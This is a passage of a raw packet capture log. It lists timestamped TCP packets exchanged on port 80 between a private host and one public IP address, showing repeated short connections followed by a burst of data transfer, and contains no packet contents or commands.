                                              Dec 13, 2024 10:48:43.223994017 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.224050999 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.228368044 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.228388071 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.228450060 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.250017881 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.369762897 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.736414909 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.736495972 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:45.778191090 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:45.898502111 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:46.273844004 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:46.273915052 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:48.339608908 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:48.459830999 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:48.834713936 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:48.834783077 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:50.886564016 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:51.006702900 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:51.369728088 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:51.369824886 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:53.402832031 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:53.714023113 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:53.803149939 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:53.833935022 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:53.891000032 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:53.891177893 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:55.964778900 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:56.084556103 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:56.470319986 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:56.473858118 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:58.496692896 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:58.619424105 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:58.998207092 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:58.998300076 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:01.028338909 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:01.148369074 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:01.519903898 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:01.520004988 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:03.652170897 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:03.773050070 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:04.136853933 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:04.140031099 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:06.324368000 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:06.444185019 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:06.817585945 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:06.821842909 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:08.980671883 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:09.100465059 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:09.481319904 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:09.481414080 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.573945999 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.574284077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.693960905 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:12.693994045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:12.694058895 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.694135904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.694344044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.814032078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179785967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179826021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179838896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179899931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.179899931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.179971933 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179985046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179996967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180010080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180025101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180041075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180075884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180169106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180191040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180203915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180212975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180257082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180257082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.299777031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.299843073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.299866915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.299937963 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.303997040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.304061890 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.371535063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.371599913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.371601105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.371635914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.375737906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.376063108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.376121044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.384147882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.384215117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.384227991 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.384260893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.392143965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.392205000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.392265081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.392307043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.400530100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.400595903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.400651932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.400772095 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.408919096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.409007072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.409061909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.409101963 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.417390108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.417438984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.417587042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.417640924 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.425729036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.425789118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.425823927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.425982952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.434109926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.434197903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.434207916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.434236050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.442643881 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.442698002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.442711115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.442739010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.450257063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.450318098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.450337887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.450378895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.491465092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.491532087 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.491569042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.491664886 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.563570023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.563649893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.563663006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.563708067 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.565912008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.565962076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.566051006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.566095114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.570600033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.570736885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.570760965 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.570780039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.575370073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.575447083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.575501919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.575546980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.580044985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.580059052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.580115080 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.584698915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.584808111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.584816933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.584968090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.589390039 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.589485884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.589509010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.589548111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.594010115 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.594068050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.594140053 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.594218016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.598678112 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.598756075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.598861933 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.598907948 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.603390932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.603457928 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.603534937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.603585958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.608025074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.608154058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.608165026 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.608386040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.612652063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.612701893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.612720013 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.612757921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.617337942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.617408037 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.617434025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.617448092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.621989965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.622045994 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.622153997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.622194052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.625673056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.625752926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.625775099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.625817060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.629324913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.629400969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.629407883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.629445076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.632937908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.632987976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.632991076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.633027077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.636631012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.636698961 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.827754974 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.827860117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.827943087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.827987909 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.829638004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.829673052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.829725981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.829756975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.831625938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.831686020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.831767082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.831815004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.833622932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.833703995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.833786964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.833833933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.837455988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837475061 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837551117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.837711096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837807894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.837852955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.840215921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.840297937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.840506077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.840703011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.872860909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.872883081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.872953892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.872996092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.873630047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.873672009 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.873713017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.873759031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.877876997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.877890110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.877933979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.878042936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.878056049 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.878098011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.879832029 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.879878998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.879973888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.880014896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.881366968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.881409883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.881531000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.881575108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.886604071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.886660099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.886756897 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.886801958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.888757944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.888811111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.889100075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.889154911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.890820026 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.890872002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.891009092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.891089916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.892038107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.892050028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.892083883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.892102003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.893918991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894105911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894593954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894607067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.894671917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.895840883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.895848036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.895895004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.897883892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.897897005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.897939920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.899724007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.899768114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.899898052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.899956942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.904932976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.904975891 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.905076981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.905137062 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.907175064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.907201052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.907218933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.907263041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.909084082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.909140110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.909245968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.909277916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.911016941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.911061049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.911187887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.911386967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.913208961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.913219929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.913260937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.915157080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.915208101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.915297031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.915338039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.916342020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.916387081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.916496992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.916546106 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.918149948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918168068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918214083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.918265104 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918298960 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.918430090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.918469906 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.920017004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.920077085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.920443058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.920484066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.922324896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.922341108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.922363997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.922389030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.923767090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.923814058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.923891068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.923927069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.926187992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.926229954 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.927423954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.927468061 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.929142952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.929153919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.929193020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.930469990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.930529118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.982292891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.982424021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.982450008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.982503891 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.983294964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.983349085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.983479977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.983573914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.985280991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.985327959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.985420942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.985485077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.986972094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.987122059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.987123966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.987235069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.989041090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.989098072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.989099979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.989162922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.991022110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.991101980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.991153002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.991193056 CET4985880192.168.2.680.82.65.70
